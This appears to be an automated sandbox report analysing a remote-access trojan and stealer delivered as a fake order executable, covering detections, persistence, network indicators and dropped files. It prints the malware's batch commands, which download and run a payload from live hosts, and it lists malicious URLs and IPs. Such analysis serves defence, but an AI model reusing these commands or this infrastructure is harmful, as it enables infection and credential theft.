                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED
                Source: Yara matchFile source: 6.0.CoinAIfdp.exe.9a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 6.0.CoinAIfdp.exe.9a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1629482910.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.1560929990.00000000009A2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED
                Source: Yara matchFile source: 6.0.CoinAIfdp.exe.9a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchst.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                OS Credential Dumping2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                12
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory14
                System Information Discovery
                Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Scheduled Task/Job
                2
                Scheduled Task/Job
                2
                Scheduled Task/Job
                111
                Obfuscated Files or Information
                Security Account Manager211
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                1
                Registry Run Keys / Startup Folder
                1
                Registry Run Keys / Startup Folder
                2
                Software Packing
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture13
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484561 Sample: JuneOrder.exe Startdate: 30/07/2024 Architecture: WINDOWS Score: 100 57 secured-order-download-businessportal.replit.app 2->57 59 jdvdpconstructionltdfileportal.replit.app 2->59 61 oshi.at 2->61 71 Multi AV Scanner detection for domain / URL 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 15 other signatures 2->77 10 JuneOrder.exe 8 2->10         started        13 svchst.exe 3 2->13         started        15 CoinAIfdp.exe 2->15         started        17 svchst.exe 2->17         started        signatures3 process4 signatures5 89 Detected unpacking (overwrites its own PE header) 10->89 19 cmd.exe 1 10->19         started        91 Antivirus detection for dropped file 13->91 93 Multi AV Scanner detection for dropped file 13->93 95 Machine Learning detection for dropped file 13->95 process6 signatures7 79 Suspicious powershell command line found 19->79 22 CoinAIfdp.exe 16 10 19->22         started        27 powershell.exe 14 16 19->27         started        29 powershell.exe 16 19->29         started        31 conhost.exe 19->31         started        process8 dnsIp9 63 oshi.at 5.253.86.15, 443, 49709 HOSTSLICK-GERMANYNL Cyprus 22->63 49 C:\Users\user\AppData\Roaming\svchst.exe, PE32 22->49 dropped 51 C:\Users\user\...\windowscachergslog.bin, data 22->51 dropped 53 WindowsCache1289fgbfbfgsdvdh=74937962458, data 22->53 dropped 81 Antivirus detection for dropped file 22->81 83 Multi AV Scanner detection for dropped file 22->83 85 Machine Learning detection for dropped file 22->85 33 cmd.exe 1 22->33         started        36 cmd.exe 1 22->36         started        65 secured-order-download-businessportal.replit.app 34.117.33.233, 443, 49707, 49708 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 27->65 87 Powershell drops PE file 27->87 55 C:\Users\user\AppData\Local\...\CoinAIfdp.exe, PE32 29->55 dropped file10 signatures11 process12 signatures13 69 Uses schtasks.exe or at.exe to add and modify task schedules 33->69 38 conhost.exe 33->38         started        40 schtasks.exe 1 33->40         started        42 svchst.exe 2 36->42         started        45 conhost.exe 36->45         started        47 timeout.exe 1 36->47         started        process14 dnsIp15 67 192.228.105.2, 49717, 7707 FIBERHUBUS United States 42->67

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                JuneOrder.exe44%VirustotalBrowse
                JuneOrder.exe55%ReversingLabsWin32.Backdoor.Asyncrat
                JuneOrder.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe100%AviraHEUR/AGEN.1353849
                C:\Users\user\AppData\Roaming\svchst.exe100%AviraHEUR/AGEN.1353849
                C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\svchst.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe71%ReversingLabsWin32.Backdoor.Asyncrat
                C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe59%VirustotalBrowse
                C:\Users\user\AppData\Roaming\svchst.exe71%ReversingLabsWin32.Backdoor.Asyncrat
                C:\Users\user\AppData\Roaming\svchst.exe59%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLink
                jdvdpconstructionltdfileportal.replit.app13%VirustotalBrowse
                secured-order-download-businessportal.replit.app1%VirustotalBrowse
                oshi.at3%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://schemas.microsof0%URL Reputationsafe
                https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe5%VirustotalBrowse
                https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg5%VirustotalBrowse
                https://oshi.at0%Avira URL Cloudsafe
                https://oshi.at/qNzy/OfCN.bin0%Avira URL Cloudsafe
                https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg100%Avira URL Cloudphishing
                https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe100%Avira URL Cloudmalware
                https://oshi.at3%VirustotalBrowse
                https://oshi.at/qNzy/OfCN.bin5%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                jdvdpconstructionltdfileportal.replit.app
                34.117.33.233
                truetrueunknown
                secured-order-download-businessportal.replit.app
                34.117.33.233
                truetrueunknown
                oshi.at
                5.253.86.15
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                https://oshi.at/qNzy/OfCN.binfalse
                • 5%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://secured-order-download-businessportal.replit.app/CoinAIfdp.exetrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpgtrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: phishing
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://oshi.atCoinAIfdp.exe, 00000006.00000002.1627907131.0000000002D66000.00000004.00000800.00020000.00000000.sdmpfalse
                • 3%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCoinAIfdp.exe, 00000006.00000002.1627907131.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.microsofCoinAIfdp.exefalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                34.117.33.233
                jdvdpconstructionltdfileportal.replit.appUnited States
                139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                192.228.105.2
                unknownUnited States
                53340FIBERHUBUStrue
                5.253.86.15
                oshi.atCyprus
                208046HOSTSLICK-GERMANYNLfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1484561
                Start date and time:2024-07-30 11:10:15 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 28s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:JuneOrder.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@26/16@3/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 87%
                • Number of executed functions: 494
                • Number of non-executed functions: 55
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                05:11:22API Interceptor57x Sleep call for process: powershell.exe modified
                05:11:29API Interceptor3x Sleep call for process: CoinAIfdp.exe modified
                05:11:38API Interceptor3x Sleep call for process: svchst.exe modified
                11:11:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CoinAi.exe C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                11:11:37Task SchedulerRun new task: svchst path: "C:\Users\user\AppData\Roaming\svchst.exe"
                11:11:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CoinAi.exe C:\Users\user\AppData\Roaming\svchst.exe
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                34.117.33.233http://login-vip.replit.app/vip/36c63962-0335-4720-9855-3e324d0acc58Get hashmaliciousUnknownBrowse
                • login-vip.replit.app/vip/36c63962-0335-4720-9855-3e324d0acc58
                192.228.105.2jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                  5.253.86.15TamenuV11.msiGet hashmaliciousUnknownBrowse
                    9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                      9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                        PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                          PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                            VGuSHbkIxk.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                              wauCcRjr6j.exeGet hashmaliciousDjvu, RedLine, SmokeLoaderBrowse
                                KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                  BHHh.exeGet hashmaliciousUnknownBrowse
                                    SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      oshi.atjdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                                      • 188.241.120.6
                                      TamenuV11.msiGet hashmaliciousUnknownBrowse
                                      • 5.253.86.15
                                      Setup 3.0.0.msiGet hashmaliciousUnknownBrowse
                                      • 188.241.120.6
                                      SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                                      • 188.241.120.6
                                      SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousUnknownBrowse
                                      • 188.241.120.6
                                      uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                      • 194.15.112.248
                                      W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                      • 194.15.112.248
                                      9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                      • 5.253.86.15
                                      9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                      • 5.253.86.15
                                      PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                      • 5.253.86.15
                                      jdvdpconstructionltdfileportal.replit.appjdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                                      • 34.117.33.233
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                      • 34.117.77.79
                                      SecuriteInfo.com.Trojan.Siggen29.7508.16428.4641.exeGet hashmaliciousUnknownBrowse
                                      • 34.117.223.223
                                      https://us-west-2.protection.sophos.com/?d=hihello.me&u=aHR0cHM6Ly9oaWhlbGxvLm1lL3AvN2I3OWEwYzAtYjI3Yi00MmU0LWE1YWEtODY0OGI1NTNiMGM5P3NoYXJlcl9pZD1Kak1TeUhmSHluVVh5a3MydFpuOG94VUdKbUcz&p=m&i=NjUwYzk1N2ZhMGU5OWEwYjY3ZDIxNzhi&t=WE1FYWNRK3hIVk5PckhQVURzVEhhT3RnY1Y5a2lpTldpOVR1VnRzYnVUcz0=&h=61e7083798104490909ca2b2d8af7b3c&s=AVNPUEhUT0NFTkNSWVBUSVYSSPnns3It4oylcIZtY22hc3gGaB3rJoPU9ItFzJAW9AGet hashmaliciousHTMLPhisherBrowse
                                      • 34.117.163.232
                                      setup.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                      • 34.117.35.28
                                      myprogram.exeGet hashmaliciousDiscord Token StealerBrowse
                                      • 34.117.59.81
                                      myprogram.exeGet hashmaliciousDiscord Token StealerBrowse
                                      • 34.117.59.81
                                      https://orr.swq.mybluehost.me/ch/f6014/Get hashmaliciousUnknownBrowse
                                      • 34.117.239.71
                                      https://orr.swq.mybluehost.me/ch/Get hashmaliciousUnknownBrowse
                                      • 34.117.239.71
                                      random.exeGet hashmaliciousUnknownBrowse
                                      • 34.117.188.166
                                      sand.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 34.117.188.166
                                      HOSTSLICK-GERMANYNLTamenuV11.msiGet hashmaliciousUnknownBrowse
                                      • 5.253.86.15
                                      w6iWaOp7uM.exeGet hashmaliciousRemcos, Binder HackToolBrowse
                                      • 5.253.86.233
                                      yt7dW9nyJK.exeGet hashmaliciousWhiteSnake Stealer, XWormBrowse
                                      • 193.142.146.239
                                      libgdi.so.0.8.2.elfGet hashmaliciousUnknownBrowse
                                      • 193.142.146.228
                                      jXBjxhHQgR.exeGet hashmaliciousCMSBruteBrowse
                                      • 193.142.146.239
                                      Transmitted.jarGet hashmaliciousDynamic StealerBrowse
                                      • 193.142.146.181
                                      Transmitted.jarGet hashmaliciousDynamic StealerBrowse
                                      • 193.142.146.181
                                      https://pub-e14f81606c7e471e8c107440821d078f.r2.dev/linkmoney.html#cmVhbHluLnJleWVzQGRlaWdsb2JhbC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                      • 193.142.59.91
                                      IJF2ZTXohv.exeGet hashmaliciousNanocoreBrowse
                                      • 193.142.59.209
                                      file.exeGet hashmaliciousBazaLoaderBrowse
                                      • 78.142.18.97
                                      FIBERHUBUSjdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                                      • 192.228.105.2
                                      http://shipit.mmthriftapps.com/login.aspxGet hashmaliciousUnknownBrowse
                                      • 199.47.211.110
                                      http://www.artisteer.com/?p=affr&redirect_url=https://tdg.site4clientdemo.com/vendor/bin/hereme/43432/6467r/biddept@lakeshorelearning.comGet hashmaliciousHTMLPhisherBrowse
                                      • 199.241.142.75
                                      94.156.8.9-skid.sh4-2024-07-23T17_40_06.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 204.77.80.0
                                      http://www.artisteer.com/?p=affr&redirect_url=https%3A%2F%2Fjaherpe.es%2Fgo%2F9iX%2FaXJAa2dobS5jb20=&domain=kghm.comGet hashmaliciousHTMLPhisherBrowse
                                      • 199.241.142.75
                                      http://www.denhamgrove.com/Get hashmaliciousUnknownBrowse
                                      • 104.225.129.134
                                      VggY4E5Wt6.exeGet hashmaliciousRedLineBrowse
                                      • 198.37.111.235
                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                      • 204.77.80.6
                                      jDSxdSv24i.elfGet hashmaliciousMiraiBrowse
                                      • 206.191.205.92
                                      AgreementCancellation-538065745-May30.pdf.7zGet hashmaliciousUnknownBrowse
                                      • 104.225.129.169
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ePRODUCTS LIST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      Your_New_Social_Security_Statement.wsfGet hashmaliciousXWormBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      TS-240730-ShellCode3.exeGet hashmaliciousUnknownBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      TS-240730-ShellCode3.exeGet hashmaliciousUnknownBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      https://www.variouscreativeformats.com/cbf68e50c507aa8717ac3d48bffe3c92/invoke.jsGet hashmaliciousUnknownBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      setup.exeGet hashmaliciousXWormBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      cheat_roblox.exeGet hashmaliciousXWormBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      https://woodoo-f51962.ingress-baronn.ewp.live/wp-content/plugins/guven/pages/region.phpGet hashmaliciousUnknownBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                      • 34.117.33.233
                                      • 5.253.86.15
                                      No context
                                      Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):944
                                      Entropy (8bit):5.351116490279513
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kzer84j:MxHKlYHKh3oPtHo6hAHKzervj
                                      MD5:A4AD9642B1D9E75F65BCFF0E383D274F
                                      SHA1:6FFB77BAB80023486A6B72A108E8B1280104649E
                                      SHA-256:E96412EECCA9FB8FAC8C09170223DAD3F52A98A52EECF462BC4F3E2720251027
                                      SHA-512:743302453D5AF5301B9AD953E111EBED2F61AB0CF2159CEEF80279A48377F08C276CE5B33CBE1441667C72B42440B9B03FC3DDA1B9A274B977876978CC39FB92
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                      Process:C:\Users\user\AppData\Roaming\svchst.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):425
                                      Entropy (8bit):5.353683843266035
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................
                                      Process:C:\Users\user\Desktop\JuneOrder.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):329
                                      Entropy (8bit):5.068935637059461
                                      Encrypted:false
                                      SSDEEP:6:NOkA1as8qOLh8CGJPASwLW3Hff43s8qOLh8CgkBanFR/sQyyd1sm1N:NOJUs8JGFJPfiWX43s8JGbDnMQyyd1HX
                                      MD5:91F265D84F2C400C6F731982FBC1DD26
                                      SHA1:6D175C5694E58DD4D0EA55E77679DE57105C6B0D
                                      SHA-256:DED4D515B9BCFDD3221DA6239DC2FAC799B129712FFCC1F92722A2C508A0C173
                                      SHA-512:4EA36DB68FA533EB1B55D365ABF400C9FC6CCA8968B1950DA2C02FD56F72B7A031583C8C730A4003354F2B010A879E94D15B80A3595E50581C72AD25C75BB67B
                                      Malicious:false
                                      Preview:@shift /0..cd %TEMP%..Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"..purchaseOrder.PNG..Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"..CoinAIfdp.exe
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):402432
                                      Entropy (8bit):5.863361032556363
                                      Encrypted:false
                                      SSDEEP:6144:pviKqHZZ16CQRTzqPbtE7PgQM0n2d3LGcm7Yib:pLu1U6nQMY2d36cm7Y
                                      MD5:1B3E4783A56A59A811CBD437C6C34A18
                                      SHA1:1C3C098D76F93570C6F72A815EE1E257DA9E2A7F
                                      SHA-256:B92D49DB7714FCADCFA107DBC3A37A12FA30E4AADEBD1EB1D551CCFE61F638DE
                                      SHA-512:C7AB45B5376677CE3484B2D575304FE23A38EB1491245D899E57C6491C999704318D6F5BF5B2FA560692BF52C531C4445F999E95269A1443323FCCB73AC58E38
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      • Antivirus: Virustotal, Detection: 59%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............7... ...@....@.. ....................................`..................................7..K....@.......................`......g7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................7......H........I..Tu.............#v...6.......................................0..Q....... ........8........E....................a.......=...8....8.... ....8....~....9.... ....~....{....:....& ....8....8k... ....~....{....9....& ....8~.......~(...(S...~)...(W... ....<.... ....~....{....9H...& ....8=...r...ps....z*...... ....~....{....9....& ....8....~&...(K... .... .... ....s....~'...(O....... ....~....{....9....& ....8........0.......... ........8........E....)...9.......8...8$...
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
